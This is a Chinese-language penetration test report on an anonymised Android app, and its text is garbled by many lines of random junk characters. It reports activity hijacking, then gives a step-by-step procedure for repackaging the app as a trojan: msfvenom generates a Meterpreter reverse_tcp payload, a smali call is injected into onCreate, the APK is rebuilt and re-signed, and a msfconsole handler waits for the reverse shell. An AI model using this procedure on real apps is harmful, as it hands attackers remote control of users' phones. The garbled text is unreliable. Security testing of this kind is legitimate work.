8 e( c2 L; i) {1 M4 }* W9 D7 r6 D& v# |' J4 I
& }$ y( a2 Y% ?2 K8 O/ y [
g5 M8 b3 P( K% x
, ?1 p3 `+ g4 I6 U+ u6 d; p$ e" I( v( ]# T( c1 n
2 检测结果
) C* d8 ]- D! j2 V+ O, Q- M1 ~# C6 Q
) Z( _ E6 Q' C# B/ g
7 Z1 ?- k# H) @2 f- `8 ~- y 5 ~& ]: ~& [& B5 G$ A+ `% e8 K% t
0 \8 i5 u" Y- Z3 p& I/ h2 m
2.1 某某某 % s9 O% s+ w! `. S3 w
- `) b) t+ t3 G* P$ _" k2 Z4 p
8 V) j( i1 s F5 `- j
. ^$ b5 S: m7 g4 a7 y; I T3 J2 Y
. h4 q3 J$ {2 I/ F( q+ P
! v+ d- Q: H1 y1 q _+ Z9 I' H$ ?, @ 2.1.1检测目标 * Z* F" b3 ^) w
% c) @: T8 T( s- t6 E
3 t8 n% r( m* {
: l& P% I$ R0 j! b( N9 | + d+ I& v: s3 d; V1 `# l
4 q! K2 @, s4 P2 K: ^
目标地址: 某某某某某某APP # c& L& J3 A7 P* h: Y2 O
( A8 m0 M' F- }- z. Y: I& h
1 I$ b) f5 o0 I5 r; {
( P1 F0 O& _/ n. l2 C
8 Z; M& h; [% O+ D# m
" K( K3 X& z! k6 H2 @ 2.1.2检测结果
8 R/ E$ S& u7 C+ j4 m# z+ s8 S" W; h; O% Y8 d k) g2 c: g
% {* |( _9 n4 ]: K# D
" c' w9 ?8 L1 J) w% y 2 X8 `8 I# s: i' I9 K
6 Y8 a& H) n* r+ ? 2.1.2.1
1 S, z: L* X) h9 E% [) }1 y' n1 {- f
' d# Z* |1 O7 C) T1 A, P4 m7 r: q, y1 u! W& A
; X7 E& _/ o8 e5 \; H
7 L/ F7 t3 V6 v3 `
漏洞链接地址:某某某某某某APP
1 M) _( [+ J# H0 A. X* I4 o. T# D9 j0 G5 O4 e8 E
; a' {4 R% x4 L* v* U: b' l [5 Q' L3 t1 S) O
; h* [4 A7 k5 [: `9 f" G3 `' W, G# Z) x# k! d* `
3 w( L+ g4 n' L3 [( q+ q
1 K8 G! ]6 y; O; e, J: y0 z
( |* Q, D0 Y5 l1 H
) |7 Y/ X3 k9 r' ]* w
+ M- F$ Q3 H" W( p/ G
! |8 v/ x D+ c 漏洞分析及取证:
! h9 d+ z; `( [' ^7 { p) Z
$ a4 a3 ?0 t4 A( V' ~% [
; i% c, `& l |- B9 b
! `# [! p( x$ U0 C& q
" c' [: ?- t6 l/ }2 q- O7 }( C) }4 y# z, B9 h1 R" G
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: $ x3 q' @! `) ?+ t4 b
/ b) V* s2 q2 u u8 {+ d: z/ h/ r
9 }: m& n3 k% c
# m6 k; e. K# n* q0 ~- x) Y
; q# }1 @! p6 @5 a7 T+ L) [7 ]3 D& J' b5 }
# ^2 K: o; } {/ }9 R( c: ~) @3 s
" P2 g' U( e2 U8 t3 d
- j2 S) E- b# x
) T% L6 x( ?* u$ ] + d7 J! S* F4 r' m
% w2 ?! I) A8 l9 J) Z
( ~9 Z1 M2 [% K4 S: b
$ @# }5 F9 y6 v0 O9 Q
; M4 |, P% g2 x4 C
+ Y b7 R/ R2 @5 v$ X
5 X) y! G3 H) n& l5 l) g' \
6 v, x6 a6 p* X6 J% [% W. b
3 W2 y% ^) s6 V: Y
6 ?. f- @) z) Z6 w" _% f) u
# }2 O4 G/ T. o$ T0 h1 h
3 Q8 V9 @( q9 q8 V+ z( n 6 S* r1 l% m- O2 D) q# z
) U9 n: }+ Q7 x) G" i
4 ~' }! c) X4 U& G" P/ w! k/ Y- {5 |$ @
9 |8 J+ \7 A6 U3 B
6 ?( I& R' }3 @- e1 B( H- g
8 l/ v$ o/ V$ O0 d: E' }/ O: n5 v1 |- \; s( h z
7 l' U2 R- f4 r
/ G. s! f/ L3 o Q" M
0 {$ v/ @0 C* O2 j% L9 A; ]
2 a4 T/ {) N" N1 Z. n! Q2 A
( o) {' y( b! ]1 ~
. ^" }6 e2 S3 a- v6 E0 x- W 漏洞危害:高
+ J* k) w, q9 X; t2 ?: z+ s$ ]+ i6 _ m+ y# A
$ b4 H) T6 u( U- a9 b9 L8 h
. w/ [/ |4 H# l+ l
. h4 A+ ]8 R8 y' O2 h
" c" D/ z7 J6 V- L" p# X
3 D1 [- f. K$ W) B, s
, Y7 @' T! ?8 e) |1 E2 D
+ a# K c( s6 T( w$ U& k
! V _/ d' H6 d' }$ Y
$ p0 Y3 {) e3 O& E3 ]; ^, o
2 V' A. H' Q7 A: P' p, ]$ n& w 9 b8 h4 q& f( P4 o0 j: K
/ V+ Q5 {# _+ f5 n& d
. g; A5 _( l0 ?3 }
; b% {, T$ E: Q( u X3 M" H/ z4 R( Y& I 严重程度
* `7 q' l/ v, F x+ o& t A' Q! t2 j/ P
2 z! S) t6 u/ I3 I, p# _. Z, h0 }; I2 Y* t
| ! H6 C' ?0 c2 @( W9 i+ I
) D6 {/ r$ y4 c* J9 ]1 j
" H% a% L! g/ i
6 W0 L" v" o0 Z, n+ r* r( S0 m
3 C# A9 z/ Z/ O1 F$ I$ ~2 b+ T% c) h/ m7 x* G1 K; M% q! `* D
高
i: N& Y5 o4 x2 a6 i [5 o
* U: G+ g6 S! t* `! T0 u- t ' ~, q1 h. i% C; U4 u, p0 R7 B
2 D- R }* ^% C9 z6 |3 w; r% v
| 3 ]% H2 B' I3 v
! S- e$ L6 a$ ?2 _1 S
+ K' D5 Q4 ]( J+ R) g9 x
5 L/ d# G' u7 z
" U5 t$ c a8 a4 ~( C; f
/ @) Y) |9 A6 l' P% b: k ■
; h2 R% m5 c1 K
+ Y. i' v# |+ f5 | ' S/ k: U( C# y9 k$ e: T
[* S: |% {, z" X. N
| + G2 a4 r3 j( n; r
% U9 z7 I c* s' x
6 D' e# A6 ^4 t$ X" E+ r
0 r1 E3 v) F1 O4 t! B9 u 3 C2 k$ l% {7 W
3 ]( v0 f* f) p3 [ 中
' Y3 s$ s) ]- t# Y" l
" s, e7 I0 O; q * p- ^* y# @: b& l5 W9 |
( e9 E, m. N1 s9 x; K; T; y |
- D9 t! J& w4 I% ~. D$ ]+ p9 D
* j; W% B, N1 h0 t" m5 u
0 Q y- m( o2 u9 ]4 j6 Q! V/ ~2 A/ h/ `: g! @$ R% J- I0 Z
' g+ T+ N8 K: ~5 w/ w# ]7 c- I( j; z$ ~6 X* q
- {) g) y2 s" E8 b1 |
8 j* l: z1 S( `( u: h) S+ W- s
F8 i! \6 r4 [7 O: s8 f' ]" G
( H% b( m4 |) w* r+ S9 J( w | 6 P' m" g6 r& B2 } R4 I1 n
( k) J0 D% a6 I# p( C; N3 a" U% ?5 O
0 j. O) ^$ E9 }! [6 S6 T: d
9 }; q. k W1 @( F* O
. ?5 D5 w( A1 i9 v1 M* A
3 f$ T; @9 o, B, M9 O% A3 X5 }
低
3 S" l: p( a! D$ e; |) U: A
! r. ~+ V# Q7 k7 p7 C' S
% v3 }$ L4 E8 W5 w
: B( \6 h D& |5 u D | ! \- q3 t1 d/ y' r
6 P( {" B6 Q) K: M6 k
5 d. Z# B3 C% v8 y- P
. y" ]7 H6 j8 |3 R) ]* P
+ i G, e$ N- P+ C, b; n$ V0 j1 `) P. ~3 s/ Y ^' I. [; N4 U
; v: z3 [& |( q3 K/ \4 ]
5 y+ b! s& ?3 \1 d4 C6 ]
! W |2 f( S7 n& R# Z7 p( R Y7 {* x5 V% `8 D+ F- }2 q
| * g! W2 B' M* D. y
( |; I; U. k& M6 X: Z
$ }6 i B6 p* F
2 H5 F5 A! ~* C0 u
4 q5 D" ^- y% a( U
- Z2 V; |$ M/ c5 u" L1 ]
7 [+ n* U" r, H" i$ \2 z1 {3 C7 X e: T9 F
6 }7 @7 Y5 E/ E
+ @4 g+ ]" y; ~$ O4 R 2 h4 M0 X5 ~! ^5 z; j* c' W% t% G
- }8 R0 c+ g, i! a
) `9 j& ^- I! \0 v& m6 V% t
7 L& J/ C5 m% x. A1 e
0 n, \ N7 W) } J5 q, W! Z3 w) v: F$ n. Z
! h3 ~+ k* P( |% _& m& x' t
' U7 p$ I7 n+ z* G 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : S5 J6 r4 | O- B% C5 ]
4 j3 X1 F# z# S
/ e2 Q. k% h% k- x& c
. U/ ?. d0 X+ |/ R8 d* M8 Y( A8 Q
& J6 t7 b0 X4 M% R6 p) M
' ]- {( f& y8 h' J! M / E8 J. w( Q; w3 s: N
) x) v* P# e6 o _+ N
6 G9 S' b. x+ E# j2 \; f) G
" Q( k1 d2 i0 @9 D, M8 D 6 ?& b' L5 R- u+ y
! O' ], E0 y$ N5 A4 c. M5 Y
2 f, O% {# D% C
3 d6 a3 _0 u* E' K! ?
, r: ~% B; r. j9 s$ m P+ k! i6 r1 [- i
% E6 b _6 s3 O9 l
. `* l* }9 T& p7 H7 _ 2.1.2.2 # f; ?9 W! q. e# H; g0 ?
- y7 g; P( A+ A, y' X8 F5 ]- \$ m
2 L/ n/ U2 k6 y8 G0 {% E3 K7 b" G6 Z W8 ^+ w, `4 U [
8 _$ }% s: N) E: T6 I: k
# m. E3 r/ Z2 `. g* X- m 漏洞链接地址:某某某某某某APP
' J' k6 ^' _4 U7 b7 H+ |- b' c4 ^' Y+ x6 T
9 V& B. e9 E) w8 o: L( ]
! u) F: f8 ~ ^2 | 0 x: U" G1 L4 h) }( ~+ n* ^) h
& z- u. |3 E4 C- X3 v1 I( x3 j5 k 漏洞分析及取证: 8 e; \$ e6 o' ~ m9 ~- K" I
( h( g% c! E5 d- m4 [
" i# T* a+ J; ]# u. ^/ R
) A" }0 o; {% ^& [ t" K& A, O0 x8 H7 {# A
J" }% H: e2 e8 m
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
& J U5 ~4 K) a% Y+ a6 Z# w9 S% |# a
! q3 j: `4 o6 L2 k; K
& C2 J% v' O% M+ t) M
, G) M$ S* V {+ u ~: {6 W1 ` s) R. ?7 _
+ h( e; j6 V% o
! o- E9 H3 h: ?/ J5 H 用Metasploit 生成木马 apk
+ S+ q4 C. `3 O e8 }/ v/ S/ L; i- ]3 K0 P8 c
$ v( ?' |( e P) h7 d+ J
, ]/ W0 z% _& @2 T% \/ F
& w0 v5 p* J0 U3 c2 D1 \# Y" H" b0 S
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
- A) U9 c* P1 y9 o, Z! x
. s2 w4 ~1 C. l# m& T3 i, j
: [# F7 x' ?& x1 j- b8 D# P. S
' x' @1 c C* J' Z s/ ]6 p& A / y# E" z+ i0 f. l4 p
# P7 v& ^! ~* i1 | 反编译目标apk和木马apk ( ^: O5 t6 b( L2 ?& V1 v
+ r4 Z" M; ^3 l4 M4 N
; r: ]" S% T! q* g2 \8 n) }$ C
- {; T# Y6 N6 U# ~ 6 O6 r! v8 f7 q5 a' h
5 m) q2 w+ ?: T8 j/ E6 R) _
apktool d target.apk
8 Y A0 Y5 [5 l/ u. ?
1 ^) M$ m$ s R8 u9 _2 w
apktool d cockhorse.apk - |2 S: T/ t# a0 L
, j3 J* L7 f" H+ m
4 a3 i, i, K9 I- V# }
2 s% i2 e9 b$ T# N. X A
5 W0 [% M, Y; Q3 J* F- E* d
' f" Q& l; D& e" F% Y* @( B8 D 木马 apk 注入目标 apk
0 B" L# e0 J* |% x5 R* G" k) y/ ~% U$ o% t) h" R
( P5 M, ~* E6 D- w. u. }! I5 N$ d- {/ P3 @3 K+ `
. V6 C* ^$ t5 T6 P& a
/ g6 I0 L6 b8 I1 t B; [7 y/ e2 S/ | 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
1 C2 k2 V u: `" x' M
7 j5 U8 x+ M4 g6 d* |3 i8 B2 Q
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
4 T& O2 s' Z+ M/ \# G/ i% z* ^' l3 m( Z |9 ]( n1 Q' _
1 [0 r) E3 t5 ]1 V0 E4 e
: d3 E( D, j1 v# f/ B, J
6 b+ K4 e( S3 I% B) ^4 g5 y: R
9 R8 ]' o0 J) n) Q" q$ ]* a 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 G" w* b& F4 U
! A, g* M" w4 o* e" |6 l+ v2 ~
( {. J2 ]) E K: x6 q6 \1 T
* [2 `3 ?4 u; s* q3 K: U
; M, [# G( D9 K6 e8 `0 k; M1 v' j/ K7 z7 H
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 8 s" |' B) D. }8 e' D: D0 |
7 B" N8 L. }, |& z: j+ e4 B
4 h2 v& _ @6 Q, S( F3 h/ @1 _3 ^6 V1 _& O1 r
% }* L7 j9 R' e2 A& S3 J) P
6 z& B7 u" ~7 W" V 回编译生成最终 apk . r1 A" ^& q7 |( _' }: o! {1 m
6 o) O4 }5 n3 x; i8 z. e
+ W/ e* @& c( a0 I; j+ @( H
9 h( q M4 Z2 {+ t& z- j. T# V2 q
, m4 ?5 _+ }. f5 t9 F9 [4 T$ r% W
o$ \& M. ]) ^7 h 重新打包
7 {. w+ H# a; r4 I
7 A9 m2 p, _/ ]$ ~
) A+ [5 x( a) L8 {1 P
& F* T. u% A! H3 E0 {# {% k% W. y; ~/ L4 ~
?9 F! r" ], q2 e: R5 {: i' s4 ]3 c% V, Y1 l* ?' Q
apktool b -o repackage.apk target_app_floder : A( t5 _- x6 v7 E
$ ^6 f! |$ T4 |+ y
" u5 F+ x+ L! Y5 v& b% a2 I" m7 k) D5 a$ O/ q8 c( t
; U6 V8 ^9 \5 y& x$ d2 {, Z1 M5 r' f, z8 G2 ?+ Z
创建签名文件,有的话可忽略此步骤
% r% [* y. [) R! K9 l$ G t: O& H# z( B
( Y" N! t8 ~6 `7 j$ ]
/ w: [" y4 E4 Y# K+ b ( E8 A. k! A! @3 ^% f
0 O/ v+ ?# _, B$ |* v( Y; s6 e8 t- Z keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
7 n/ ]3 T5 a; v4 |- a/ N' \+ R% U
/ q8 ?. l8 G6 ^" C* e$ V
$ r7 n! h+ i6 _; }* n' ^, l- R0 F3 q/ y! T" h9 C3 p
5 a( D1 }( D1 j1 d$ H* k6 x+ q& S. D, X+ d7 {; H; U
签名,以下任选其一 + d4 b4 u' `7 W
) S, n. V. E3 ^* |5 u
' P* n7 U- B5 `- |/ K# C; [* ~- {7 D% d8 }! O" ?
3 z; `4 x- D) i b) K& F; L" q6 Y5 c b5 L! A, v; i
jarsigner 方式
9 P8 q$ @6 v! P2 G, X8 D2 T! `$ H
o+ D) m7 Z( n5 ~$ m9 O" ^: A5 K2 P! F9 K
; y) B$ ` C- ^
/ G& y0 u3 M+ F9 H1 ~+ u jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
% T4 i( N; a6 V% O2 {1 ^0 b
6 ~/ b% t# N& A# s0 ?, s( B
8 y- e; P1 r0 y2 q. w4 W
* @$ d. h* F. l9 Z Q2 }, x( i* e1 K
2 _" u- x+ V' `5 B# w e+ M
$ V4 V G1 k" f6 K) T, W6 y
apksigner 方式 + n+ c# @7 K4 b! z! W* Y
3 t7 H( _* ^, S( j9 A6 O9 u F
& u h) q, L! \
+ Z. Y, W) X$ m9 {- o
! i n; l/ V, D- Q8 t' ? ^+ f6 N& O( A
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 o8 @& N% |1 V, c/ p/ M
; I+ h n; N6 P2 N. E+ e. O) M
, z/ l( G0 }5 u! A5 ~- v
4 g4 y& q7 ]; v/ `# i7 M3 W8 D
% c9 @7 H/ M* K2 S5 o8 U6 ?% C. q& v
如需要禁用 v2签名 添加选项--v2-signing-enabled false ; U- l% K0 Q! g. N
' M# p4 ]- j- a
, c _7 V. E1 |' a5 j/ ]( r
5 e( ~ s( S0 J o% g
$ v0 c; z& X* t
3 `& J; v. F- ~0 p0 J- g# O
验证,以下任选其一
# }# O8 ~$ P: b. Z8 R0 d
1 b3 k; ~0 a" ] m( q R
T" Y; D8 W, {) E* A Q2 g# }3 y9 w: Z2 j7 d
' o. S! K9 E# Q1 ]$ H: p( A! F
4 v! s# x8 U7 m2 j, f9 d jarsigner方式
1 s6 B6 y1 |; Y( U a% d7 x9 @6 T' a; O' B% I" \
u" v: J+ T: c% s
$ A2 j5 h, V- ?
+ Z) g7 T: f9 c0 e- M# ?* [( k
1 U+ W5 G. H( c. [7 z; ? jarsigner -verify repackaged.apk
% D" J; q( r: D x7 I. G! r- N' Q; Z$ X' o' R3 N# L
( L6 O: |: k3 I' J" ?7 _3 W4 T
- I$ B" l# ?1 J z3 v5 X
: L% Q/ ]% }% d. R
2 i' [. K7 H5 X7 E4 X
apksigner 方式 * E4 o8 m' R, f! Y
% ?+ @$ C4 h- m
4 W! E! @& _, n, M g8 D
* a0 [+ N( M9 e+ x! O
3 T" V9 u7 c% P4 o
6 a2 z# l* H/ `! r0 r! U9 U
apksigner verify -v --print-certs repackaged.apk 0 B7 ^4 B$ G. Z5 ]4 y$ a' P2 @
% R" N- p2 [ T8 C
; F; Z# ~3 I, d, E" X8 a
% I1 l8 L* G, @
- ]. s; s1 x* T0 I$ w A( e+ J& `
keytool方式
. z6 O0 S" z4 |' C! k) H% V+ i
8 b" n* ~3 L3 k) H+ {
) H# T4 S1 s: k0 l
; A' B; t! C1 B- b7 _ j 2 r) X7 ?. f t2 l. K. ~
+ m2 J" s9 k4 Y* d
keytool -printcert -jarfile repackaged.apk - t) W7 v J/ Z
0 K$ Z: k& p. S
' B0 H# F8 J) k2 E
2 ~7 M& l7 `: X+ K) [ . j; V; K" W3 e( U- w2 e% V
# ~: o& W4 i" {7 a) v4 A( @: ~
对齐 * @+ L" Y$ t: H D$ L
" i/ C& u8 r) T- v6 r
- j+ d# w4 v+ p% }* }7 ?
2 l. M$ S7 M, d' u
0 {1 M, w+ K# h# W. K' K0 S
/ P [& U* Y- c& }* }, ] 字节对齐优化 3 Z; T5 _6 L7 d/ d5 R
9 f3 U, d: X, X# W+ J0 p: j' }
- o" J1 m; N x# Y5 C, Z
+ L% M( Y' p; F ) \3 D& G7 M+ {" l
4 |# S2 K$ ^; x" |4 m0 r
zipalign -v 4 repackaged.apk final.apk
7 V2 S/ q) a! ^3 f
" e* n. ~& K l \) l" V
9 B( p5 }! U, H7 {0 x0 Z) o) x, c- o/ [7 n2 L; \8 J
1 Y% S8 ` t/ m- c8 ^; ]5 n% F" c! V7 m4 j1 C
检查是否对齐 8 l5 L! a1 g6 y1 b( T* L, L3 z# Z7 h
. D5 \7 {/ h' }9 d: C3 S
3 T! E+ a$ } c# |7 D v- ^4 M
; {( e% f H; e- [ + X* n# Y8 y0 M0 d
& `5 E+ K j/ b
zipalign -c -v 4 final.apk
: @% z. `% ~& S- A1 O4 e! U/ B9 ]# n) m8 f9 G+ I) }9 W
U1 J& }9 z! d
/ i3 N, C/ o" b5 w% G3 p" {' G8 Y / v0 b/ R( G5 o0 i: a) k
9 i# R+ X$ @0 B# r' N! b 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
1 F7 c! `$ A2 z& `3 d6 U2 R
% ]0 x1 a' W) V, a
$ f0 ^7 }3 S4 L- y
+ T t% q: v9 b" E& e
- T" u' h- K! O! L8 M: H% p p; L; P1 v0 _1 V1 x( |
启动Metasploit控制台,配置参数等待上线
- u8 w* S: l6 H5 g
3 q" Q X" s6 R4 F" X: T" F! K
7 D3 C. ]' z) V8 I9 P( G
, J; G2 [; u% P1 @8 D% o$ }
3 `! N `& }$ Z v
. O D6 N# g4 S$ \ 在终端依次输入如下命令 4 g) x2 F" G# {' @
* [8 c% [) [1 ]
5 W U" H/ Z3 I) Z- [
4 X7 ~2 `' U/ F$ m6 M + \- [' S' T% X; ]" s) `1 |" V
- [0 h# T2 C$ ]- b0 g! I# g7 D/ R msfconsole
$ N( p. T# E, O/ p; j; D* W3 P5 j; \5 O) B% g+ Z
1 ] D. L3 H, g. R9 D! I! E7 ~
" |; ?, n: T* V) t$ h* i
x. V" X6 n5 Z& `- [. I8 }) b/ I! p
use exploit/multi/handler * w+ Z. K- {( t2 P1 {
" O: M, ~$ P1 Y( Y" k% ~
- h8 E. K% T- O' {( ~
# e6 U2 m6 w W5 I
" G6 D+ C* ]7 t Z
- w, i! \5 p1 e. U0 }1 @ set PAYLOAD android/meterpreter/reverse_tcp / U& o$ c1 M# ~9 O2 l
$ F8 d) w6 {$ p( i2 ^
; u2 v7 F# |/ T# V4 h$ C ?
% x. B* I( D! z# S8 }4 i8 l 7 M, i2 E9 c3 k+ x% H
7 c9 ^& e T% u! Q, v
set LHOST 192.xxx.xx.xx
, A6 G% a: L: C; [! |/ p
3 S0 J; [9 F) w5 ]; ?6 w
9 W2 K0 A- h! M+ T/ V
+ A" y, ^4 W; o! w. w3 d
1 e8 v6 X T; V
) q/ v4 r4 s3 S& N" V$ Y1 B, Q6 M set LPORT 4444
% q) W+ n* Q0 Z8 `- }6 R2 H3 \4 G; P% Q; g/ I7 K2 R
" x8 L( x/ c- S( f [' Z& r7 k' ~; Q( M7 s
- e" \) z. t, }* h) V3 t0 w+ R; g9 \- ?& z* k" X( \
exploit ! ~4 ^! l `- P9 Z
2 g- Q# g0 Z, r& ~
! F, j9 x# Z7 R) `. n
* w% f9 D2 D/ w2 m
2 T7 H7 p9 P1 e& M) ~* P' `& k: a# G3 } W/ Q& u
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
9 r& o2 p% m' [7 K. s
3 b# z- K4 c; I. E
- ^, x+ r- a$ l
4 Q6 Y! r1 E6 N6 p8 N
2 z! F, ?5 R$ ~9 E% g# P5 j @, {+ |1 z
9 m$ A3 Y& i9 S 漏洞危害:中 ) r- c5 v# Z$ h2 C& D% e
% x9 u0 C9 ]$ V5 o4 q; a# t7 s
6 C/ H7 x+ h# T. g( @* s) q3 o- H9 ?" G2 [- h
" v$ n* e/ s/ Z# r: p" \) P9 V
) O% ~2 I( x1 T" b
# ?6 d' c( @( P: g
: e# r$ j8 l5 N3 r6 n 1 J3 _" q- i; U2 [
|% m4 f( x6 ~3 V f* ]" a" _ t: A
+ Q& {6 b1 G8 J: ]1 }5 m- c& \! V5 R/ ], z h, y; ~
2 C, n+ |! @* { J0 w1 M) z' U' T/ R7 `6 g5 ^- B
4 @" f* }* @0 ]
" p7 d7 M* `6 T! d( b5 g, j
% O) r2 E$ s; \# j. V6 }7 o4 C1 N& u4 i) N- Y
严重程度
/ K/ W, n" \: L7 ^/ w: C/ Q, W+ p& v3 Y
6 _' _$ v7 B3 g: z% B6 [9 @5 c& A- M3 l9 b8 X' b
|
4 ?; |! y% `" O, e" \ ~# F5 g, }. T8 F, f c
% M7 b) d' }; z, g2 n# ~# f: q8 z
4 j' I) L+ `9 _4 P: z5 X
( M7 S4 a8 J2 e$ x% e R* k0 R, V2 ]4 V- p1 N- Z! c
高 7 a$ _: C4 v5 s) p; g! @# _
1 U& {7 G6 r0 }% K% K
% t u4 C+ O! u
4 {# ~3 J. b3 t1 _5 l9 n' N |
: i# s& O) S( D/ F0 y
7 [ b$ c2 Q. ^6 T4 x7 }
: e1 z( D/ F. e* A) q$ H2 @% v5 K8 l" u9 `$ \
* |( l- A5 b: o
4 C7 V! W' ~6 e5 q) b/ L ■
2 X F7 w$ t" {6 q- t: z }1 v% |0 S0 q
6 x3 f, I) H' T
2 M. d9 R! I( n3 X& t |
& m Q( Z2 \2 j3 y
$ z) _% R r5 ` k " J9 n( V$ r/ x) w/ A
! z' ~% m; y& ?4 |4 Z
# d2 g/ c; T+ T+ @; a3 @
; |. [) w( G' w7 I# D# q
中 8 w* `" B7 S$ z. X, c
- I2 B- J7 ^3 {' ?$ W
; n" q) U( M- _- r+ F
& |( ]5 I' j: `( F1 s6 I5 m8 P% U |
. d8 B/ L2 F8 x! J, I
) f7 w$ s% u: v8 s0 F ; H! c( g& l& z0 f, p# X. R) ~
( Y( ^: h( R1 t% q0 A. C
: q9 U7 f* t; p
0 n9 o+ V. N8 b! | ^" \
9 S' E* K0 S* b! r) G
% J1 r$ S% A3 x# z
/ V" h3 }" l6 }! A# H. V
8 z3 ^5 }2 I0 M7 }& a" S
& ?* b* V: w' N- j7 g9 a
L7 q! n" ^% m& _. H! h S |
/ s- a8 y$ X% l* H
7 ]% O) q) C. o- D9 r+ k. T
& q( Z0 z6 N% A( V0 {0 f( } v# M4 s6 i. _, O
! F. V+ [+ u- W3 K$ [# W+ G8 V5 ^
4 f& T" i" ]3 P# K
低 1 D5 V4 y3 \' e; ^5 M, W2 U" X
8 J7 V* l" `" _, S$ C+ G ( b2 J2 o! p N0 X o/ z
. P+ Q+ H( q; w9 ^+ _. _ |
9 i! X3 K* I# P1 q
. R5 \5 k/ u( B9 Q
& k$ e( }6 d" D3 K
( |5 o6 b! I% P5 q; h! i
; u V4 X, t! ^2 F V+ E2 `4 ^5 J, @; ^5 p# z2 u# K7 b! x- C
2 y9 u$ V9 e* B% Y! Y5 R5 W# T
6 c+ `: k5 M7 {# }. d, V i
, N" x7 `* C4 T8 O! i* S# H F* p$ E0 x( Q) J0 u
0 G: y7 \0 ~, W% Z2 N6 T
0 l+ Q1 i ~6 H8 o
| ; ]8 b' Q0 ], P4 N4 G) h
! q1 D1 ]) W8 M3 c
- N: i: S1 T/ A' n7 X# y' n6 Z
1 l" G+ @6 l8 M- I4 f- y7 E
% h9 O9 z/ |/ S$ C/ J- l ^& l( I- b9 R# |
- E/ K. h+ M4 n2 r( p
' l/ ^# a" T. t$ {" ~; E; k 7 g$ g# Z; P9 G$ j4 T
* S% @* z, V U* }
) B& s' \5 `7 U! K
2 v, e$ ?) }/ _; u2 f
2 T$ u! n" S- ]9 t5 ^, \: k2 `+ c* z7 `
& k7 E0 r0 [& u5 G5 ]$ E
8 p+ C4 i$ w8 p! g; J7 }) j
- \4 ^9 L3 i7 o! }+ y1 m g: B( Y2 V& H% R* {/ q
修复方法: , M* y4 p+ S0 a/ C3 M- g, J
5 Q9 H; H! m/ _$ a4 H+ J
8 q' w1 C1 Z2 Q" J
0 d# |: S {: }: N; G* L * i7 W" y# V7 k2 |8 j! ^ @
, w% p0 B3 v* ~8 y: h! r" e 1.在 APP 启动时应做签名校验防止二次打包。
( t7 h# k% a! }. y- {
8 f4 z. n( E8 X8 z8 I- ^( K- A 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , l3 B& s% H4 ^+ @3 E
( D6 x7 |' F' Q2 b
. B0 w# Y4 U4 I, y: a0 B5 f! S) R6 Z5 E( K# K6 K* f( ]
: X- N8 ?( d- F* M/ q( S
. j$ y$ E4 Y% w R6 _2 q w# t- h
! U3 Y: m: c2 ^% N, b! f1 w4 U- Q2 u& m0 x+ L; H6 w! ]
& d# S9 Z3 V* B6 Y
& i$ {7 l8 Z1 s& n
! j& d" l, U8 e! F3 u U3 E; W/ G Y1 B8 X
7 {; k# t/ R2 ^9 w
$ u4 c' d" t7 @" h
: |0 \0 Q4 c& r/ n
* f4 G) a+ V9 e5 e/ U
& `' F5 z9 F. n+ m8 t# ~; b
; }6 R3 ~0 S8 U. G! ~
* Q5 d6 R3 m _9 q" W3 M' Q. s: \
, p8 w/ P! K% ]# E